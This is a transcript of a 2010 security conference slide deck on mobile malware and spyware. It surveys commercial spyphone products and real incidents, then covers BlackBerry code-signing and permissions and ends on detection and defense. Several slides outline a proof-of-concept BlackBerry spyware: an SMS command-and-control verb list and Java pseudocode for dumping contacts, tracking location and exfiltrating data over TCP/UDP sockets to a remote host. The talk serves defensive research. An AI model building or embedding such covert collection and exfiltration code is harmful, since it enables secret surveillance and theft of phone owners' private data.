SlideShare una empresa de Scribd logo
1 de 53
The Monkey Steals the Berries



Mobile Malware – The State of Mobile Security
Presenter Background

 Currently
      – Sr. Security Researcher, Veracode, Inc.
 Previously
      – Security Consultant - Symantec
      – Security Consultant - @Stake
      – Incident Response and Forensics
        Handler
 Wishes He Was
      – Infinitely rich
      – Able to leap tall buildings in a single
        bound
      – Smarter than the average bear


© 2010 Veracode, Inc.                             2
Agenda

 Background
 Attacker Motivation
 Malicious Mobile Applications In The Wild
 Mobile Security Mechanisms
 Potential Effects of Behaviors
 Detecting Malicious Mobile Applications
 Mitigation




© 2010 Veracode, Inc.                         3
Background




© 2010 Veracode, Inc.                4
Malicious Mobile Applications

 Often includes modifications to
  legitimate programs designed to
  compromise the device or device
  data
 Often inserted by those who have
  legitimate access to source code or
  distribution binaries
 May be intentional or inadvertent
 Not specific to any particular
  programming language
 Not specific to any particular mobile
  Operating System


© 2010 Veracode, Inc.                     5
Attacker Motivation




© 2010 Veracode, Inc.                         6
Attacker Motivation

 Practical method of compromise for many systems
      – Let the users install your backdoor on systems you have no access to
      – Looks like legitimate software so may bypass mobile AV
 Retrieve and manipulate valuable private data
      – Looks like legitimate application traffic so little risk of detection
 For high value targets such as financial services and government it
  becomes cost effective and more reliable
      – High-end attackers will not be content to exploit opportunistic vulnerabilities,
        which might be fixed and therefore unavailable at a critical juncture. They
        may seek to implant vulnerability for later exploitation
      – Think “Aurora” for Mobile Devices




© 2010 Veracode, Inc.                                                                      7
Units Sold By Operating System
               90,000.00
                             80,879
               80,000.00
                           72,934

               70,000.00

               60,000.00
  Units Sold




               50,000.00

               40,000.00                  34,347                                                                                           2008 Units
                                                                                                                                           2009 Units
               30,000.00                               24,890
                                       23,149

               20,000.00                                        16,498
                                                    11,418                    10,622
               10,000.00                                             15,028                  6,798
                                                                                                          1,193     4,027
                                                                                  8,127   641         0                     1,112
                    0.00
                           Symbian    Research In   iPhone OS   Microsoft      Linux      Android    WebOS         Other OSs
                                        Motion                  Windows
                                                                 Mobile
                                                                                                           Data Source: DISTMO Appstore Analytics
                                                                   Operating System                                  www.appstore.info




© 2010 Veracode, Inc.                                                                                                                                   8
Units Sold Market Growth
                                       8%

                                                                        6%
                                       6%
   Percentage Growth in Market Share




                                       4%                  3%                                                     3%



                                       2%

                                                                                                                            0%
                                       0%
                                             Symbian   Research In   iPhone OS   Microsoft        Linux         Android   WebOS     Other OSs          0%
                                                         Motion                  Windows
                                                                                  Mobile
                                       -2%
                                                                                                                                        -2%
                                                                                    -3%             -3%
                                       -4%



                                       -6%     -6%
                                                                                             Operating System

                                                                                                                              Data Source: DISTMO Appstore Analytics
                                                                                                                                        www.appstore.info




© 2010 Veracode, Inc.                                                                                                                                                  9
Application Counts

                                     160,000        150,998


                                     140,000


                                     120,000
   Number Of Applications In Store
     Last Counted Jan/Feb 2010




                                     100,000


                                      80,000


                                      60,000


                                      40,000

                                                                     19,897
                                      20,000
                                                                                       6118             5291
                                                                                                                          1452                 944
                                          0
                                               iPhone App Store    Android       Nokia Ovi Store   Blackberry App   Palm App Catalog      Windows
                                                                  Marketplace      (Maemo)             World                             Marketplace
                                                                                                                         Data Source: DISTMO Appstore Analytics
                                                                                        Marketplace Name                           www.appstore.info




© 2010 Veracode, Inc.                                                                                                                                             10
iPhone Applications Sold



                                      3.00
    Applications Sold (In Billions)




                                      2.50

                                      2.00

                                      1.50

                                       1.00

                                       0.50

                                       0.00




Data Source: Gartner, Inc., a research and advisory firm




© 2010 Veracode, Inc.                                                                 11
Back To The Future




© 2010 Veracode, Inc.   12
Back To The Future




© 2010 Veracode, Inc.   13
Malicious Mobile Applications In The Wild




© 2010 Veracode, Inc.                                               14
FlexiSpy

 http://www.flexispy.com
 $149 - $350 PER YEAR depending on features
 Features
      – Remote Listening
      – C&C Over SMS
      – SMS and Email Logging
      – Call History Logging
      – Location Tracking
      – Call Interception
      – GPS Tracking
      – Symbian, Blackberry, Windows Mobile Supported


© 2010 Veracode, Inc.                                   15
FlexiSpy Web Site Quotes

 “Download FlexiSPY spyphone software directly onto a mobile
  phone and receive copies of SMS, Call Logs, Emails, Locations and
  listen to conversations within minutes of purchase. “
 “Catch cheating wives or cheating husbands, stop employee
  espionage, protect children, make automatic backups, bug meetings
  rooms etc.”
 “F Secure seem to think that its ok for them to interfere with
  legitimate, legal and accountable software. Who appointed them
  judge, jury and executioner anyway, and why wont they answer our
  emails, so we have to ask who is the real malware? Here is how to
  remove FSecure malware from your device. Please don't believe the
  fsecure fear mongers who simply wish you to buy their products.”



© 2010 Veracode, Inc.                                                 16
Mobile Spy

 http://www.mobile-spy.com
 $49.97 PER QUARTER or $99.97 PER YEAR
 Features
      – SMS Logging
      – Call Logging
      – GPS Logging
      – Web URL Logging
      – BlackBerry, iPhone (Jailbroken Only), Android, Windows Mobile or Symbian




© 2010 Veracode, Inc.                                                              17
Mobile Spy Web Site Quotes

 “This high-tech spy software will allow you to see exactly what they
  do while you are away. Are your kids texting while driving or using
  the phone in all hours of the night? Are your employees sending
  company secrets? Do they erase their phone logs?”
 “Our software is not for use on a phone you do not own or have
  proper permission to monitor from the user or owner. You must
  always follow all applicable laws and regulations in your region.”
 “Purchased by more than 30,000 customers in over 150 countries”




© 2010 Veracode, Inc.                                                    18
Etisalat (SS8)

 Cell carrier in United Arab Emirates (UAE)
 Pushed via SMS as “software patch” for Blackberry smartphones
 Upgrade urged to “enhance performance” of Blackberry service
 Blackberry PIN messaging as C&C
 Sets FLAG_HIDDEN bit to true
 Interception of outbound email / SMS only
 Discovered due to flooded listener server cause retries that drained
  batteries of affected devices
 Accidentally released the .jar as well as the .cod (ooopsie?!)




© 2010 Veracode, Inc.                                                    19
Storm8 Phone Number Farming

 iMobsters and Vampires Live (and others)
 “Storm8 has written the software for all its games in such a way that
  it automatically accesses, collects, and transmits the wireless
  telephone number of each iPhone user who downloads any Storm8
  game," the suit alleges. " ... Storm8, though, has no reason
  whatsoever to access the wireless phone numbers of the iPhones on
  which its games are installed."
 “Storm8 says that this code was used in development tests, only
  inadvertently remained in production builds, and removed as soon as
  it was alerted to the issue.”
 These were available via the iTunes App Store!
 http://www.boingboing.net/2009/11/05/iphone-game-dev-accu.html


© 2010 Veracode, Inc.                                                 20
Symbian Sexy Space

 Poses as legitimate server ACSServer.exe
 Calls itself 'Sexy Space„
 Steals phone and network information
 Exfiltrates data via hacker owned web site connection
 Can SPAM contact list members
 Basically a “botnet” for mobile phones
 Signing process
      – Anti-virus scan using F-Secure
            Approx 43% proactive detection rate (PCWorld)
      – Random selection of inbound manually assessed

 Symbian signed this binary as safe!
 http://news.zdnet.co.uk/security/0,1000000189,39684313,00.htm
© 2010 Veracode, Inc.                                             21
Symbian MergoSMS

 The worm spreads as self-signed (untrusted) SIS installers
 Installer contains sub-SIS installers some of them signed by
  Symbian.
 Spreads by sending text messages
      – Contain variable messages in Chinese and a link to a website
      – Going to link results in worm download
 On phone reboot malware runs, downloads worm payload,
  completing infection
 The worm was spread on Chinese file sharing web sites
 Originally spread as games, themes, etc. for Symbian Series60
  3rd & 5th edition phones.
 http://www.f-secure.com/v-descs/trojan_symbos_merogosms.shtml
© 2010 Veracode, Inc.                                                  22
09Droid – Banking Applications Attack

 Droid app that masquerades as any number of different target banking
  applications
 Target banks included
      – Royal Bank of Canada
      – Chase
      – BB&T
      – SunTrust
      – Over 50 total financial institutions were affected

 May steal and exfiltrate banking credentials
 Approved and downloaded from Google’s Android Marketplace!
 http://www.theinquirer.net/inquirer/news/1585716/fraud-hits-android-apps-
  market
 http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3209953
 http://www.f-secure.com/weblog/archives/00001852.html

© 2010 Veracode, Inc.                                                         23
3D Anti-Terrorist / PDA Poker Art / Codec Pack WM1.0

 Games available on legitimate application download sites
 Originally written by Chinese company Huike
 Repackaged in Russia by unknown authors to include malware
 Calls premium rate 800 numbers
 Three days idle before first dial
 Idles one month between subsequent outbound dialing
 Distributed via common Windows Mobile shareware sites


 http://www.eweek.com/c/a/Security/Malware-Hidden-in-Windows-
  Mobile-Applications-424076/


© 2010 Veracode, Inc.                                            24
Mobile Security Mechanisms




© 2010 Veracode, Inc.                                25
Does It Really Matter?!



    Only 23% of smartphone owners use the security software
                   installed on the devices.
    (Source: Trend Micro Inc. survey of 1,016 U.S. smartphone users, June 2009)


    13% of organizations currently protect from mobile viruses
                        (Mobile Security 2009 Survey by Goode Intelligence)




© 2010 Veracode, Inc.                                                             26
Common Mobile Security Mechanisms

 Corporate level security policies
        Applied at the corporate IT level
        Can‟t be modified by a lower level security mechanism


 Application level security policies
        May be pushed down from corporate policy
        Otherwise applied at handset itself
        Restricts access to specific resources
        Sandboxing
        Code Signing


© 2010 Veracode, Inc.                                            27
Common Mobile Security Mechanisms

 Mobile Anti-Virus
        Implemented at the handset itself
        Fails due to the same reasons PC antivirus is failing today


 Application market place security screening
        Applied by the marketplace owner
        Currently opaque and ill defined
        Misplaced trust already acquired




© 2010 Veracode, Inc.                                                  28
Code Signing

 Subset of Blackberry API considered “controlled”
 Use of controlled package, class, or method requires appropriate
  code signature
 Blackberry Signature Tool comes with the Blackberry JDE
 Acquire signing keys by filling out a web form and paying $20
      – This not is a high barrier to entry
      – 48 hours later you receive signing keys
 Install keys into signature tool




© 2010 Veracode, Inc.                                                29
Code Signing Process

 Hash of code sent to RIM for API tracking purposes only
 RIM does not get source code
 COD file is signed based on required keys
 Application ready to be deployed


 Easy to acquire anonymous keys




© 2010 Veracode, Inc.                                       30
Blackberry IT Policies

 Requires connection to Blackberry Enterprise Server (BES)
 Supersedes lower levels of security restrictions
 Can prevent devices from downloading third-party applications over
  wireless
 Prevent installation of specific third-party applications
 Control permissions of third party applications
      – Allow Internal Connections
      – Allow Third-Party Apps to Use Serial Port
      – Allow External Connections
 MOSTLY “Default Allow All” policy for BES and non-BES
  devices


© 2010 Veracode, Inc.                                                  31
Blackberry Application Policies

 Can be controlled at the BES
 If no BES present, controls are set on the handheld itself
 Can only be MORE restrictive than the IT policy, never less
 Control individual resource access per application
 Control individual connection access per application
 MOSTLY “Default Allow All” policy for BES and non-BES
  devices




© 2010 Veracode, Inc.                                           32
V4.7.0.148 Default 3rd Party Application Permissions


                          Bluetooth        Phone
USB Connections                                            Location Data
                         Connections     Connections


                           Internet           IPC         Device Settings


                         Application
          Media                             Themes        Input Simulation
                        Management


                                         Security Timer
 Browser Filtering        Recording
                                            Reset


      Email Data        Organizer Data       Files         Security Data


© 2010 Veracode, Inc.                                                        33
V5.0.0.328 Default 3rd Party Application Permissions


                          Bluetooth        Phone
USB Connections                                             Location Data
                         Connections     Connections


  Server Network           Internet           IPC          Device Settings


                         Application
          Media                             Themes         Input Simulation
                        Management


                                         Security Timer   Display Information
 Browser Filtering        Recording
                                            Reset            While Locked


      Email Data        Organizer Data       Files          Security Data


© 2010 Veracode, Inc.                                                         34
V5.0.0.328 Trusted 3rd Party Application Permissions


                          Bluetooth        Phone
USB Connections                                             Location Data
                         Connections     Connections


  Server Network           Internet           IPC          Device Settings


                         Application
          Media                             Themes         Input Simulation
                        Management


                                         Security Timer   Display Information
 Browser Filtering        Recording
                                            Reset            While Locked


      Email Data        Organizer Data       Files          Security Data


© 2010 Veracode, Inc.                                                         35
Potential Effects and Behaviors




© 2010 Veracode, Inc.                                     36
Installation Methods

 Accessing a web site using the mobile browser and choosing to
  download the application over the network (OTA Installation)
 Running the application loader tool on the desktop system and
  choosing to download the application onto the device using a
  physical connection to the computer
 Using enterprise management solutions to push the application to
  the entire user community


 Get it into the global application marketplace and let the user
  choose to install it for you!




© 2010 Veracode, Inc.                                                37
Logging and Dumping

               Monitor connected / disconnected calls
               Monitor PIM added / removed / updated
               Monitor inbound SMS
               Monitor outbound SMS
               Real Time track GPS coordinates



               Dump all contacts
               Dump current location
               Dump phone logs
               Dump email
               Dump microphone capture (security prompted)



© 2010 Veracode, Inc.                                        38
Exfiltration and C&C Methods

               SMS (No CDMA)
               SMS Datagrams (Supports CDMA)
               Email
               HTTP GET
               HTTP POST
               TCP Socket
               UDP Socket
               DNS Exfiltration



                Default command and control to inbound SMS
                TXSPROTO Bidirectional TCP based command and control



© 2010 Veracode, Inc.                                                  39
Technical Methods




 Data Dumpers
 Listeners
 Exfiltration Methods
 Command and Control




© 2010 Veracode, Inc.    40
Command and Control Channels

 initCandC(int a)
      – Initializes inbound SMS listener if passed a == 1
      – Kills spyware otherwise
      – Listens for commands and acts accordingly

        TXSDIE           TXSPHLON        TXSPHLOFF        TXSPIMON      TXSPIMOFF

     TXSSLINON           TXSSLINOFF      TXSSLOUTON     TXSSLOUTOFF      TXSGLON

     TXSGLOFF           TXSEXFILSMS     TXSEXFILSMSDG   TXSEXFILEMAIL   TXSEXFILGET

  TXSEXFILPOST          TXSEXFILTCP      TXSEXFILUDP    TXSEXFILDNS     TXSDUMPGPS

    TXSDUMPPL           TXSDUMPEMAIL     TXSDUMPMIC     TXSDUMPCON       TXSPROTO

 TXSPORT[PORT]          TXSPHONE:[PN]    TXSURL[URL]    TXSGTIME:[N]     TXSPING

     TXS:[HOST]           TXSIP:[IP]    TXSEM:[EMAIL]




© 2010 Veracode, Inc.                                                                 41
Dump Contact Information
 API
     – javax.microedition.pim
     – net.rim.blackberry.API.pdap
 Pseudocode
   PIM pim = PIM.getInstance();
   BlackBerryPIMList contacts = (BlackBerryPIMList)
   pim.openPIMList(PIM.CONTACT_LIST, PIM.READ_ONLY);
   Enumeration eContacts = contacts.items();
   Contact contact = (Contact) eContacts.nextElement();
    if (contacts.isSupportedField(Contact.EMAIL)) {
     if (contact.countValues(Contact.EMAIL) > 0) email =
   contact.getString(Contact.EMAIL, 0);
    }



© 2010 Veracode, Inc.                                      42
Location Listener

 Create the class that implements LocationListener Interface
 Get LocationProvider instance
 Add LocationListener
 API
      – javax.microedition.location.LocationProvider.getInstance
      – javax.microedition.location.LocationProvider.setLocationListener
 Pseudocode
    ll = new LocListener();
    lp = LocationProvider.getInstance(null);
    lp.setLocationListener(ll, 1, 1, 1);




© 2010 Veracode, Inc.                                                      43
TCP/UDP Exfiltration

 API
      – javax.microedition.io.StreamConnection
      – javax.microedition.io.DatagramConnection
 Pseudocode
    conn =
          (StreamConnection)Connector.open("socket://"+this.ip+":"+this.port+";
    deviceside=true";);
    out = new OutputStreamWriter(conn.openOutputStream());
    out.write(msg, 0, length);


    conn =
    (DatagramConnection)Connector.open("udp://"+this.ip+":"+this.port+";4444");
    Datagram out = conn.newDatagram(buf, buf.length);
    out.setData(buf, 0, buf.length);
    conn.send(out);


© 2010 Veracode, Inc.                                                             44
Detecting Malicious Mobile Code




© 2010 Veracode, Inc.                                     45
Detecting Malicious Mobile Code

 Signature Based Detection
      – This is how the current anti-virus world is failing
      – Requires “known” signatures for detection
      – Too reactive - broken


 Resource Usage White Listing
      – Require individual configuration and white listing of resources
      – Make it fine grained enough to be effective
      – Balancing act resulting in user complaints about ease of use
      – People just click ok - semi broken




© 2010 Veracode, Inc.                                                     46
Detecting Malicious Mobile Code

 Sandbox Based Execution Heuristics
      – Run the application and detect malicious activity
      – Requires execution in a sandbox and is reactive
      – Can‟t ensure complete execution
      – Also semi broken




© 2010 Veracode, Inc.                                       47
Mobile Malicious Code Detection

   Enumerate Mobile Sensitive Taint Sources
        – Sources of potentially private information
        – This is what the attacker is stealing


   Enumeration of Mobile Exfiltration Methods
        – Methods by which data can be transferred off the mobile device
        – How the attacker is sending your data out


   Code Flow Tracing
        – Follow data from taint source to exfiltration sink
        – Annotate the existence of potential exfiltration
        – Confirm against expected exfiltration of program
© 2010 Veracode, Inc.                                                      48
Defense in Depth

                               Do all of the above!
 Implement and enforce strong IT policies
 Implement and enforce additional application policies as required
 Implement a best of breed anti-virus solution
      – If only for thoroughness of deployed options
 Utilize static decompilation and analysis of applications considered
  for deployment




© 2010 Veracode, Inc.                                                    49
Demonstration




© 2010 Veracode, Inc.                   50
Conclusion

 We are currently trusting the vendor application store provider for the
  majority of our mobile device security
 Minimal methods of real time eradication or detection of spyware
  type activities exists
 When the do exist they are not configured correctly (or at all)
 No easy/automated way to confirm for ourselves what the
  applications are actually doing
 Automate the decompilation and static analysis of applications that
  are required for the ongoing functioning of your business




© 2010 Veracode, Inc.                                                   51
The Monkey Steals the Berries!
                                Questions?
© 2010 Veracode, Inc.                                    52
Questions?

Más contenido relacionado

La actualidad más candente

Somo - Investing in a Mobile Strategy (UK specific)
Somo - Investing in a Mobile Strategy (UK specific)Somo - Investing in a Mobile Strategy (UK specific)
Somo - Investing in a Mobile Strategy (UK specific)Ross Sleight
 
Facebook: an investment for the future
Facebook: an investment for the futureFacebook: an investment for the future
Facebook: an investment for the futureIdeas4Tomorrow
 
Roadshow asia nick lane internet & social media
Roadshow asia nick lane internet & social mediaRoadshow asia nick lane internet & social media
Roadshow asia nick lane internet & social mediamobilesquared Ltd
 
The future is mobile_gemiusMobile_presentation_10.2010
The future is mobile_gemiusMobile_presentation_10.2010The future is mobile_gemiusMobile_presentation_10.2010
The future is mobile_gemiusMobile_presentation_10.2010Gemius
 
Tarik Fawzi, AEneas #Maduk
Tarik Fawzi, AEneas #MadukTarik Fawzi, AEneas #Maduk
Tarik Fawzi, AEneas #MadukJames Cameron
 
Mobile Marketing Slide Deck
Mobile Marketing Slide DeckMobile Marketing Slide Deck
Mobile Marketing Slide DeckKevin McGee, MBA
 
Мониторинг рынка плоского стекла
Мониторинг рынка плоского стеклаМониторинг рынка плоского стекла
Мониторинг рынка плоского стеклаAgency of Industrial Marketing
 
The rules of mobile advertising
The rules of mobile advertisingThe rules of mobile advertising
The rules of mobile advertisingSeungyul Kim
 
Procontent.Ru: Andrew Bud (mBlox, MEF) presentation at VAS V Conference
Procontent.Ru: Andrew Bud (mBlox, MEF) presentation at VAS V ConferenceProcontent.Ru: Andrew Bud (mBlox, MEF) presentation at VAS V Conference
Procontent.Ru: Andrew Bud (mBlox, MEF) presentation at VAS V ConferenceProcontent.Ru Magazine
 
Ad Mob Mobile Metrics Feb 10
Ad Mob  Mobile  Metrics  Feb 10Ad Mob  Mobile  Metrics  Feb 10
Ad Mob Mobile Metrics Feb 10bianchiassociates
 

La actualidad más candente (13)

Mobile Services in Japan
Mobile Services in JapanMobile Services in Japan
Mobile Services in Japan
 
Somo - Investing in a Mobile Strategy (UK specific)
Somo - Investing in a Mobile Strategy (UK specific)Somo - Investing in a Mobile Strategy (UK specific)
Somo - Investing in a Mobile Strategy (UK specific)
 
Mobile Vas
Mobile VasMobile Vas
Mobile Vas
 
Facebook: an investment for the future
Facebook: an investment for the futureFacebook: an investment for the future
Facebook: an investment for the future
 
Roadshow asia nick lane internet & social media
Roadshow asia nick lane internet & social mediaRoadshow asia nick lane internet & social media
Roadshow asia nick lane internet & social media
 
The death of the click (с) Osnat Zaretsky
The death of the click (с) Osnat ZaretskyThe death of the click (с) Osnat Zaretsky
The death of the click (с) Osnat Zaretsky
 
The future is mobile_gemiusMobile_presentation_10.2010
The future is mobile_gemiusMobile_presentation_10.2010The future is mobile_gemiusMobile_presentation_10.2010
The future is mobile_gemiusMobile_presentation_10.2010
 
Tarik Fawzi, AEneas #Maduk
Tarik Fawzi, AEneas #MadukTarik Fawzi, AEneas #Maduk
Tarik Fawzi, AEneas #Maduk
 
Mobile Marketing Slide Deck
Mobile Marketing Slide DeckMobile Marketing Slide Deck
Mobile Marketing Slide Deck
 
Мониторинг рынка плоского стекла
Мониторинг рынка плоского стеклаМониторинг рынка плоского стекла
Мониторинг рынка плоского стекла
 
The rules of mobile advertising
The rules of mobile advertisingThe rules of mobile advertising
The rules of mobile advertising
 
Procontent.Ru: Andrew Bud (mBlox, MEF) presentation at VAS V Conference
Procontent.Ru: Andrew Bud (mBlox, MEF) presentation at VAS V ConferenceProcontent.Ru: Andrew Bud (mBlox, MEF) presentation at VAS V Conference
Procontent.Ru: Andrew Bud (mBlox, MEF) presentation at VAS V Conference
 
Ad Mob Mobile Metrics Feb 10
Ad Mob  Mobile  Metrics  Feb 10Ad Mob  Mobile  Metrics  Feb 10
Ad Mob Mobile Metrics Feb 10
 

Destacado

DS Rana Resume
DS Rana ResumeDS Rana Resume
DS Rana ResumeD.S. Rana
 
Deepesh_Rai_Resume_Latest
Deepesh_Rai_Resume_LatestDeepesh_Rai_Resume_Latest
Deepesh_Rai_Resume_LatestDeepesh Rai
 
SEDO INTRODUCTION
SEDO INTRODUCTIONSEDO INTRODUCTION
SEDO INTRODUCTIONiadsedo
 
Transforming Education through Digital and Media Literacy
Transforming Education through Digital and Media LiteracyTransforming Education through Digital and Media Literacy
Transforming Education through Digital and Media LiteracyRenee Hobbs
 
Composition writing
Composition writingComposition writing
Composition writingpvillacanas
 
EvaJones_Resume
EvaJones_ResumeEvaJones_Resume
EvaJones_ResumeEva Jones
 

Destacado (11)

Mentoring
Mentoring Mentoring
Mentoring
 
DS Rana Resume
DS Rana ResumeDS Rana Resume
DS Rana Resume
 
Melissa_Smith
Melissa_SmithMelissa_Smith
Melissa_Smith
 
Deepesh_Rai_Resume_Latest
Deepesh_Rai_Resume_LatestDeepesh_Rai_Resume_Latest
Deepesh_Rai_Resume_Latest
 
¿QUE ES EL DEPORTE?
¿QUE ES EL DEPORTE?¿QUE ES EL DEPORTE?
¿QUE ES EL DEPORTE?
 
SEDO INTRODUCTION
SEDO INTRODUCTIONSEDO INTRODUCTION
SEDO INTRODUCTION
 
Machine learning
Machine learningMachine learning
Machine learning
 
Transforming Education through Digital and Media Literacy
Transforming Education through Digital and Media LiteracyTransforming Education through Digital and Media Literacy
Transforming Education through Digital and Media Literacy
 
Prasheel
PrasheelPrasheel
Prasheel
 
Composition writing
Composition writingComposition writing
Composition writing
 
EvaJones_Resume
EvaJones_ResumeEvaJones_Resume
EvaJones_Resume
 

Similar a BRUCon 2010 - The Monkey Steals the Berries

Comilion introduction presentation 26102012 (1)
Comilion introduction presentation 26102012 (1)Comilion introduction presentation 26102012 (1)
Comilion introduction presentation 26102012 (1)AP DealFlow
 
India now the largest mobile advertising market in Asia Pacific
India now the largest mobile advertising market in Asia PacificIndia now the largest mobile advertising market in Asia Pacific
India now the largest mobile advertising market in Asia PacificInMobi
 
How mobile-ready are corporate websites?
How mobile-ready are corporate websites?How mobile-ready are corporate websites?
How mobile-ready are corporate websites?Web Managers Group
 
AdMob 2010 mart istatistikleri
AdMob 2010 mart istatistikleriAdMob 2010 mart istatistikleri
AdMob 2010 mart istatistikleriErol Dizdar
 
Ad mob 2010 mart istatistikleri-
Ad mob 2010 mart istatistikleri-Ad mob 2010 mart istatistikleri-
Ad mob 2010 mart istatistikleri-Erol Dizdar
 
Ad mob mobile-metrics-mar-10
Ad mob mobile-metrics-mar-10Ad mob mobile-metrics-mar-10
Ad mob mobile-metrics-mar-10Erol Dizdar
 
中国アプリ市場とその周辺
中国アプリ市場とその周辺中国アプリ市場とその周辺
中国アプリ市場とその周辺良太郎 小原
 
Numbers - Analytics Driving Economy
Numbers - Analytics Driving EconomyNumbers - Analytics Driving Economy
Numbers - Analytics Driving EconomyVishal Gurbuxani
 
Android and its apps market overview
Android and its apps market overviewAndroid and its apps market overview
Android and its apps market overview01Booster
 
Enterprise Mobility Computerworld Mar 2012
Enterprise Mobility Computerworld Mar 2012Enterprise Mobility Computerworld Mar 2012
Enterprise Mobility Computerworld Mar 2012Exicon
 
Quantacast Mobile Web trends report 2009
Quantacast Mobile Web trends report 2009Quantacast Mobile Web trends report 2009
Quantacast Mobile Web trends report 2009guestd94b193
 
The Chronicles of a Mobile-Web Economy
The Chronicles of a Mobile-Web EconomyThe Chronicles of a Mobile-Web Economy
The Chronicles of a Mobile-Web EconomyBernard Leong
 
Mobile 101 Class 1: Technology and Mobile Behavior
Mobile 101 Class 1: Technology and Mobile BehaviorMobile 101 Class 1: Technology and Mobile Behavior
Mobile 101 Class 1: Technology and Mobile BehaviorThe Media Kitchen
 
DSS ITSEC Conference 2012 - MobileIron MDM, MAM & Mobile Security
DSS ITSEC Conference 2012 - MobileIron MDM, MAM & Mobile SecurityDSS ITSEC Conference 2012 - MobileIron MDM, MAM & Mobile Security
DSS ITSEC Conference 2012 - MobileIron MDM, MAM & Mobile SecurityAndris Soroka
 
Byod four steps to enabling your network michael greco
Byod four steps to enabling your network michael grecoByod four steps to enabling your network michael greco
Byod four steps to enabling your network michael grecoK Singh
 

Similar a BRUCon 2010 - The Monkey Steals the Berries (20)

Comilion introduction presentation 26102012 (1)
Comilion introduction presentation 26102012 (1)Comilion introduction presentation 26102012 (1)
Comilion introduction presentation 26102012 (1)
 
Mobclix Sfmobile
Mobclix SfmobileMobclix Sfmobile
Mobclix Sfmobile
 
5 mobile trends (2009)
5 mobile trends (2009)5 mobile trends (2009)
5 mobile trends (2009)
 
India now the largest mobile advertising market in Asia Pacific
India now the largest mobile advertising market in Asia PacificIndia now the largest mobile advertising market in Asia Pacific
India now the largest mobile advertising market in Asia Pacific
 
How mobile-ready are corporate websites?
How mobile-ready are corporate websites?How mobile-ready are corporate websites?
How mobile-ready are corporate websites?
 
AdMob 2010 mart istatistikleri
AdMob 2010 mart istatistikleriAdMob 2010 mart istatistikleri
AdMob 2010 mart istatistikleri
 
Ad mob 2010 mart istatistikleri-
Ad mob 2010 mart istatistikleri-Ad mob 2010 mart istatistikleri-
Ad mob 2010 mart istatistikleri-
 
Ad mob mobile-metrics-mar-10
Ad mob mobile-metrics-mar-10Ad mob mobile-metrics-mar-10
Ad mob mobile-metrics-mar-10
 
中国アプリ市場とその周辺
中国アプリ市場とその周辺中国アプリ市場とその周辺
中国アプリ市場とその周辺
 
3CX Microsoft IP Telephone System
3CX Microsoft IP Telephone System3CX Microsoft IP Telephone System
3CX Microsoft IP Telephone System
 
Numbers - Analytics Driving Economy
Numbers - Analytics Driving EconomyNumbers - Analytics Driving Economy
Numbers - Analytics Driving Economy
 
Android and its apps market overview
Android and its apps market overviewAndroid and its apps market overview
Android and its apps market overview
 
Enterprise Mobility Computerworld Mar 2012
Enterprise Mobility Computerworld Mar 2012Enterprise Mobility Computerworld Mar 2012
Enterprise Mobility Computerworld Mar 2012
 
Hk enterprise mobility computerworld mar 2012
Hk enterprise mobility computerworld mar 2012Hk enterprise mobility computerworld mar 2012
Hk enterprise mobility computerworld mar 2012
 
Seventynine.mobi
Seventynine.mobiSeventynine.mobi
Seventynine.mobi
 
Quantacast Mobile Web trends report 2009
Quantacast Mobile Web trends report 2009Quantacast Mobile Web trends report 2009
Quantacast Mobile Web trends report 2009
 
The Chronicles of a Mobile-Web Economy
The Chronicles of a Mobile-Web EconomyThe Chronicles of a Mobile-Web Economy
The Chronicles of a Mobile-Web Economy
 
Mobile 101 Class 1: Technology and Mobile Behavior
Mobile 101 Class 1: Technology and Mobile BehaviorMobile 101 Class 1: Technology and Mobile Behavior
Mobile 101 Class 1: Technology and Mobile Behavior
 
DSS ITSEC Conference 2012 - MobileIron MDM, MAM & Mobile Security
DSS ITSEC Conference 2012 - MobileIron MDM, MAM & Mobile SecurityDSS ITSEC Conference 2012 - MobileIron MDM, MAM & Mobile Security
DSS ITSEC Conference 2012 - MobileIron MDM, MAM & Mobile Security
 
Byod four steps to enabling your network michael greco
Byod four steps to enabling your network michael grecoByod four steps to enabling your network michael greco
Byod four steps to enabling your network michael greco
 

Más de Tyler Shields

The New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP IrelandThe New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP IrelandTyler Shields
 
Defending Behind the Mobile Device
Defending Behind the Mobile DeviceDefending Behind the Mobile Device
Defending Behind the Mobile DeviceTyler Shields
 
Avoiding the Pandora Pitfall
Avoiding the Pandora PitfallAvoiding the Pandora Pitfall
Avoiding the Pandora PitfallTyler Shields
 
Social and Mobile and Cloud - OH MY!
Social and Mobile and Cloud - OH MY!Social and Mobile and Cloud - OH MY!
Social and Mobile and Cloud - OH MY!Tyler Shields
 
Social Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social MediaSocial Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social MediaTyler Shields
 
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...Tyler Shields
 
Shmoocon 2010 - The Monkey Steals the Berries
Shmoocon 2010 - The Monkey Steals the BerriesShmoocon 2010 - The Monkey Steals the Berries
Shmoocon 2010 - The Monkey Steals the BerriesTyler Shields
 
Survey of Rootkit Technologies and Their Impact on Digital Forensics
Survey of Rootkit Technologies and Their Impact on Digital ForensicsSurvey of Rootkit Technologies and Their Impact on Digital Forensics
Survey of Rootkit Technologies and Their Impact on Digital ForensicsTyler Shields
 
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers ViewpointSource Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers ViewpointTyler Shields
 
Software Developers Forum 2010 - The Monkey Steals the Berries
Software Developers Forum 2010 - The Monkey Steals the BerriesSoftware Developers Forum 2010 - The Monkey Steals the Berries
Software Developers Forum 2010 - The Monkey Steals the BerriesTyler Shields
 
Static Detection of Application Backdoors
Static Detection of Application BackdoorsStatic Detection of Application Backdoors
Static Detection of Application BackdoorsTyler Shields
 
Blackhat Europe 2009 - Detecting Certified Pre Owned Software
Blackhat Europe 2009 - Detecting Certified Pre Owned SoftwareBlackhat Europe 2009 - Detecting Certified Pre Owned Software
